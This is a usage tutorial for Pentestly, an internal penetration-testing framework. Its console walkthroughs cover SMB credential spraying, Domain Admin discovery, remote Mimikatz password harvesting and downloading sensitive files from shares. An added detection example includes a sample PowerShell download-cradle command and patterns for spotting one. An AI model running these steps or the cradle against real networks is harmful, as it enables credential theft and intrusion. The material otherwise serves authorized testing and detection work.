Pentestly: A Python and Powershell Internal Penetration Testing Framework Tool
Pentestly is a framework for internal penetration tests built from a growing set of Python tools. Its main aim is to bring the power of Python, PowerShell and other tools together behind a familiar user interface, and because it is written in Python, contributing to the framework should be easy.
These are the tools currently utilized in Pentestly:
Invoke-Mimikatz.ps1 - Runs Mimikatz from PowerShell.
wmiexec.py - Executes PowerShell commands quickly and easily over WMI.
recon-ng - Its well-designed backend database is leveraged for data storage and manipulation.
smbmap.py - Enumerates SMB shares.
powercat.ps1 - Provides Netcat-like functionality in PowerShell.
Features of Pentestly:
>> Imports Nmap XML.
>> Tests SMB authentication using:
- individual credentials,
- a file of credentials, or null credentials,
- an NTLM hash.
>> For successful SMB authentications, tests whether the credentials have local administrator privileges.
>> Identifies readable SMB shares for valid credentials.
>> Stores Domain/Enterprise Admin account names.
>> Determines where Domain Admin processes are running and which systems have logged-in Domain Admins.
>> Executes PowerShell commands in memory and exfiltrates the results, including running Mimikatz to gather plaintext passwords from memory.
How to install it:
Run the following commands:
git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly
How to use it:
Step 1 - Change the workspace
[pentestly][default] > workspaces list
+------------+
| Workspaces |
+------------+
| default |
+------------+
[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project
Step 2 - Load from nmap
[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options
Name Current Value Required Description
-------- ------------- -------- -----------
FILENAME /root/PROJECT/full-all-alive.xml yes Path and filename for nmap XML input
[pentestly][project][nmap_xml] > run
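Step 2 hands Pentestly an Nmap XML file and the framework keeps the hosts worth testing SMB logins against. As an added example (not Pentestly's own nmap_xml module, and not code from the post), the parser below shows what that import has to do: walk each host in the nmaprun, keep the ones that are up with 445/tcp open, and carry the IP, hostname and open ports forward. The XML is a constructed sample.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output: one host with 445/tcp open,
# one where 445 is filtered, one with no SMB port at all.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="192.168.8.10" addrtype="ipv4"/>
    <hostnames><hostname name="fs01.corp.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports></host>
  <host><status state="up"/><address addr="192.168.8.11" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports></host>
  <host><status state="up"/><address addr="192.168.8.12" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port></ports></host>
</nmaprun>
"""


def smb_hosts_from_nmap_xml(xml_text, smb_port=445):
    """Return [(ip, hostname or None, sorted open tcp ports)] for up hosts with smb_port open."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.findall("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        # Skip hosts that are down or have no IPv4 address (IPv6-only hosts are out of scope here)
        if status is None or status.get("state") != "up" or addr is None:
            continue
        open_ports = sorted(
            int(p.get("portid"))
            for p in host.findall("ports/port[@protocol='tcp']")
            if p.find("state") is not None and p.find("state").get("state") == "open"
        )
        if smb_port not in open_ports:
            continue
        hn = host.find("hostnames/hostname")
        found.append((addr.get("addr"), hn.get("name") if hn is not None else None, open_ports))
    return found


if __name__ == "__main__":
    for ip, name, ports in smb_hosts_from_nmap_xml(SAMPLE_NMAP_XML):
        print(f"{ip:16} {name or '-':20} open tcp: {ports}")
```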
Step 3 - Test logins
Test logins using a file of credentials:
[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run
Or use a single username and password:
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
Use credentials against a small subset of IPs:
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'
Step 4 - Gather Domain and Enterprise Admins
[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options
Name Current Value Required Description
------ ------------- -------- -----------
SOURCE default yes source of input (see 'show info' for details)
[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2
Step 6 - Run Mimikatz against the IPs where you have execute rights
[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
Select the local interface for hosting scripts:
0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1
[*] Execution creds: domain\Admin:adminpassword@192.168.1.1
[*] Success! Admin.DA:p@$$w0rd - DOMAIN ADMIN!
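The mimikatz step above runs Invoke-Mimikatz.ps1 on the target through WMI, with the script served from the interface you selected. As an added example from the detection side (not part of Pentestly or of this post), the logic below scores process-creation events for that pattern: a shell spawned by the WMI provider host (processes created through Win32_Process appear as children of WmiPrvSE.exe), a PowerShell download cradle or remote URL in the command line, and hidden-window or no-profile flags. The event records are constructed samples with fields modelled on Sysmon Event ID 1.

```python
import re

# Constructed sample process-creation events (fields modelled on Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://10.220.8.94:8080/Invoke-Mimikatz.ps1')"},
    {"host": "ws02", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c hostname"},
    {"host": "ws03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Download-cradle markers: WebClient / Invoke-WebRequest calls or any URL in the command line.
DOWNLOAD_CRADLE = re.compile(
    r"\b(downloadstring|downloadfile|iwr|invoke-webrequest|net\.webclient)\b|https?://", re.I)
STEALTH_FLAGS = re.compile(r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-enc", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (severity, reasons) for one event; 'high' needs two or more indicators."""
    reasons = []
    image = basename(ev["image"])
    # Win32_Process.Create runs the new process under the WMI provider host
    if basename(ev["parent"]) == "wmiprvse.exe" and image in SHELLS:
        reasons.append("shell spawned by WmiPrvSE.exe (remote WMI execution)")
    if image in POWERSHELL and DOWNLOAD_CRADLE.search(ev["cmdline"]):
        reasons.append("PowerShell download cradle / remote URL in command line")
    if image in POWERSHELL and STEALTH_FLAGS.search(ev["cmdline"]):
        reasons.append("hidden-window, no-profile or encoded PowerShell flags")
    severity = "none" if not reasons else ("medium" if len(reasons) == 1 else "high")
    return severity, reasons


def triage(events):
    """Map each host with a high-severity event to the reasons that fired."""
    return {ev["host"]: score_event(ev)[1] for ev in events if score_event(ev)[0] == "high"}


if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS).items():
        print(host, "->", "; ".join(reasons))
```

A lone WmiPrvSE.exe child shell (ws02 here) is only medium because legitimate management tooling also creates processes over WMI; the combination with a remote download is what makes the Pentestly pattern stand out.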
Step 7 - Show local admins
[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run
+----------------+--------+------------+------------+--------+---------+-----------+---------+---------+--------+
| host           | access | username   | password   | domain | process | logged_in | success | execute | module |
+----------------+--------+------------+------------+--------+---------+-----------+---------+---------+--------+
| 10.202.208.112 |        | nsportsman | password1! | zojix  |         |           | True    | True    | login  |
+----------------+--------+------------+------------+--------+---------+-----------+---------+---------+--------+
Step 8 - Show domain admins
[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run
+----------------+--------------+-----------+-----------------+--------+---------+-----------+---------+---------+--------+
| host           | access       | username  | password        | domain | process | logged_in | success | execute | module |
+----------------+--------------+-----------+-----------------+--------+---------+-----------+---------+---------+--------+
| 10.202.208.112 | Domain Admin | TheRealDA | </l33TPassword> | zojix  |         |           | True    | True    | login  |
+----------------+--------------+-----------+-----------------+--------+---------+-----------+---------+---------+--------+
Step 9 - Enumerate shares:
[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:BadAdminPassword@192.168.224.252
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})
Step 10 - Show new shares:
[pentestly][default][interesting_files] > show pentestly_shares
+-------+-----------------+---------------+-----------+-------------------+----------+------------+
| rowid | host            | username      | readwrite | readonly          | noaccess | module     |
+-------+-----------------+---------------+-----------+-------------------+----------+------------+
| 1     | 192.168.224.252 | Administrator |           | ADMIN$,C,C$,Users | IPC$     | enumshares |
+-------+-----------------+---------------+-----------+-------------------+----------+------------+
Step 11 - Find and download interesting files
[pentestly][default][interesting_files] > show options
Name Current Value Required Description
------- ------------- --------- -----------
PATTERN (Groups.xml|Services.xml|Printers.xml|Drives.xml|DataSources.xml|ScheduledTasks.xml|unattend|important|passw|backup|setup).*[^dll][^exe]$ yes Regex pattern to look for in filenames
SOURCE default yes source of input (see 'show info' for details)
You can change the pattern to something more specialized:
[pentestly][default][interesting_files] > set pattern important.txt|super_secret
PATTERN => important.txt|super_secret
[pentestly][default][interesting_files] > show options
Name Current Value Required Description
------- ------------- -------- -----------
PATTERN important.txt|super_secret yes Regex pattern to look for in filenames
SOURCE default yes source of input (see 'show info' for details)
Run the module and download the files found:
[pentestly][default][interesting_files] > run
[*] Administrator
[*] Execution creds: workgroup\Administrator:BadAdminPassword@192.168.224.252
[+] Match found! Downloading: Users\Administrator\Desktop\important.txt.txt
192.168.224.252-Users_Administrator_Desktop_important.txt.txt
[+] Match found! Downloading: Users\Administrator\Desktop\super_secret.txt
192.168.224.252-Users_Administrator_Desktop_super_secret.txt
Contributing:
Creating new modules in Pentestly is easy. Begin with the code provided in skeleton.py:
from libs.pentestlymodule import PentestlyModule


class Module(PentestlyModule):
    meta = {
        'name': 'Your module name goes here',
        'author': 'Developer name goes here',
        'description': 'Description of the module goes here',
        'query': 'SQL QUERY whose result is passed to your module',
        'options': (
            # (name, default value, required: True or False, description)
            ('Option1', 'Default Value', True, 'Description of option'),
        ),
    }

    def module_pre(self):
        # Optional
        # Happens before your module
        pass

    def module_run(self, data):
        # Required
        # data is the result from the SQL query set in the options
        ### A few magic functions
        # self.query - Perform an SQL query on the internal database
        results = self.query("select * from pentestly_creds")
        # self.output - print default information to the user
        self.output("Performed an SQL query")
        self.output(results)
        # self.success - print a success message to the user
        self.success("Yay! We performed successful work")

    def module_post(self):
        # Optional
        # Happens after your module
        pass
TODO:
- Implement a secretsdump.py module.
- Add utility functions for database queries, similar to creds and services.
- Rework the draw_table function to use fixed-width columns.
- Import credentials from Gladius.
- Implement a GPP password search-and-decrypt module.